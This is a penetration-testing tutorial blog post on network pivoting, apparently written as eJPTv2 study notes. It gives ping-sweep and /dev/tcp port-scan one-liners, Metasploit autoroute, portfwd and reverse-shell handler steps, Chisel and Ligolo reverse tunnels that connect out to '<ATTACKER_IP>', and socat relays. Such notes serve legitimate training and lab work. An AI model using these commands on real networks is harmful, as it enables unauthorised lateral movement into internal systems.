Post

Pivoting

Posted Updated
By Whare1
5 min read
Pivoting

img-description

Pivoting is a critical technique in penetration testing, allowing an attacker to move laterally through a network after compromising an initial system. The goal is to gain access to other systems or network segments that are not directly accessible from the attacker’s original position. This is achieved by leveraging the compromised machine as a relay point.

Pivoting is especially useful for:

  • Exploring internal networks.
  • Accessing services or machines isolated from the attacker’s starting point.
  • Enumerating hosts and identifying vulnerable systems within other network segments.

NETWORK EXPLORATION

  1. Enumerating Network Interfaces:
    • Linux:
      1
2

      ip -a
ifconfig
    • Windows:
      1

      ipconfig
  2. Identifying Active Network Connections: Using ss on Linux can help locate open ports and associated IPs:
    1

    ss -netup

    If successful, this command may reveal the IP address of another network interface connected to a different segment, providing a potential target for further exploitation.

These commands serve as the foundation for understanding the network topology and planning further actions such as scanning, service enumeration, or setting up routing for pivoting.

ENUMERATING OPEN PORTS

Method 1: Using a Bash Script (Improvement Needed)

The following script scans for common open ports on a range of IP addresses. Note that improvements can be made to optimize this method:

1
2
3
4
5
6
7

#!/bin/bash

for i in $(seq 1 254); do
        for port in 21 22 80 443 8080 445; do
                timeout 1 bash -c "echo '' > /dev/tcp/10.10.0.$i/$port" &>/dev/null && echo "[+] Host 10.10.0.$i - PORT $port - OPEN" &
        done
done; wait

Method 2: Using Ping Sweep One-Liners

For Windows:

1

for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up.

For Linux:

1

for i in {1..254}; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done

For Linux (Port Scanning):

1

for i in {1..65535}; do (echo > /dev/tcp/127.0.0.1/$i) >/dev/null 2>&1 && echo $i is open; done

METASPLOIT FOR PIVOTING (eJPTv2)

The goal of eJPTv2 is to use Metasploit for pivoting. Pivoting in Metasploit allows an attacker to route traffic through a compromised system to reach other internal machines that would otherwise be inaccessible. This technique is crucial for post-exploitation when targeting segmented networks.

METHODS TO ESTABLISH ROUTES

Method 1: Using msfconsole for Reverse Shell (Automatic Routing)

  1. Exploit the target machine using msfconsole.
  2. After obtaining root access via msfconsole, type background to suspend the session but keep it active.
  3. Use sessions -l to list all active session IDs.
  4. Search for the autoroute module:
    1

    search post/multi/manage/autoroute

    Use it and provide the session ID from step 3 when prompted.

  5. Return to the session with:
    1

    sessions -i <ID>

    Use port forwarding to access desired ports on the target machine:

    1

    portfwd add -l <your_port> -p <target_port> -r <target_ip>

Method 2: Establishing a Reverse Shell to msfconsole

  1. From msfconsole, use the following module:
    1

    use multi/handler

    Configure the necessary parameters to set up a listener.

  2. Execute a reverse shell command from the compromised machine.
  3. Background the session with background and list the session ID using sessions.
  4. Use the following module to upgrade to a Meterpreter shell:
    1

    use shell_to_meterpreter

    Fill in the required parameters (e.g., IP and session ID).

  5. Enter the new Meterpreter session:
    1

    sessions -i <ID>

Manual Routing:

  • Exit the session and add routes manually within msfconsole:
    1

    route add <IP> <SESSION_ID>
  • To remove a route:
    1

    route del <IP> <SESSION_ID>

USING NMAP WITH METASPLOIT

Since Nmap does not integrate directly with Metasploit, use the following module:

1

use auxiliary/scanner/portscan/tcp

Set the target IP and execute the scan with run.

PORT FORWARDING WITH METASPLOIT

To forward a specific port (e.g., port 80):

1

portfwd add -l <your_port> -p 80 -r <victim_ip>

Then attack the forwarded port locally.

ACCESSING LOCALHOST SERVICES

Use SSH to expose internal services:

1

ssh -g -L 0.0.0.0:8081:localhost:8080 user@localhost

Then forward the port (e.g., 8081) using portfwd.

CONNECTING TO SSH THROUGH ROUTING

Background the session with Ctrl+Z, search for the ssh_login module, and configure it for the desired target.

CHISEL FOR PIVOTING (Strict SOCKS Mode)

Chisel is a fast TCP/UDP tunnel, transported over HTTP/2, that allows you to create a secure and reliable tunnel through firewalls or NATs. It is commonly used for pivoting, allowing attackers to bypass network restrictions and gain access to internal systems. Chisel is lightweight and supports multiple connections, making it a useful tool for penetration testers and red teamers when tunneling traffic between machines. Download it here

Attacker Machine:

Start the Chisel reverse server:

1

chisel server --reverse -p 8000

Victim Machine:

Run the following command:

1

chisel client <ATTACKER_IP>:8000 R:socks

Proxy Configuration:

Edit /etc/proxychains4.conf, uncomment the strict_chain section, and add:

1

socks5 127.0.0.1 1080

Using Nmap Through the Tunnel:

1

proxychains nmap -sT -Pn --top-ports 5000 -open -T5 -v -n <IP> 2>/dev/null

Connecting into database through the tunnel:

1

proxychains4 mysql -u wp_user -p -h 172.17.0.1 wordpress --ssl=0

Accessing HTTP in Browser:

Configure FoxyProxy with a new SOCKS5 proxy on port 1080.

Using Gobuster Through SOCKS:

1

gobuster dir -u http://10.0.2.6 -w /usr/share/wordlists/dirb/big.txt --proxy socks5://127.0.0.1:1080

Exposing Internal Services:

1
2

chisel client 10.10.14.6:9000 R:9631:localhost:631
ssh -g -L 0.0.0.0:8081:localhost:8080 user@localhost

CHISEL FOR PIVOTING (Dynamic SOCKS Mode)

If the victim machine can access additional hosts:

  1. Start Chisel on the victim machine:
    1

    chisel client <PREVIOUS_MACHINE_IP>:2322 R:8888:socks
  2. On the previous machine, activate Socat to forward traffic:
    1

    ./socat TCP-LISTEN:2322,fork TCP:<CHISEL_CLIENT_IP>:8000
  3. Update /etc/proxychains4.conf:
    1
2

    dynamic_chain
socks5 127.0.0.1 8888

LIGOLO FOR PIVOTING

Download Ligolo from the official repository here

Setup for Attacker and Third Machine

  1. Create a new network interface:
    1

    sudo ip tuntap add user $USER mode tun ligolo
  2. Bring up the interface:
    1

    sudo ip link set ligolo up
  3. Add a route:
    1

    sudo ip route add 10.0.2.0/24 dev ligolo
  4. Start the Ligolo proxy:
    1

    ./proxy -selfcert
  5. Transfer and run the Ligolo agent on the victim machine:
    1

    ./agent -connect <ATTACKER_IP>:<PROXY_PORT> -ignore-cert
  6. Establish the session from the proxy and type start to begin routing.

Handling Reverse Connections:

If the victim machine cannot initiate connections to the attacker:

  1. Set up a listener:
    1

    listener_add -addr 0.0.0.0:8080 --to 127.0.0.1:80
  2. List active listeners:
    1

    listener_list

    netrunner

Pentesting & Techniques
pivoting chisel metasploit ligolo
This post is licensed under CC BY 4.0 by the author.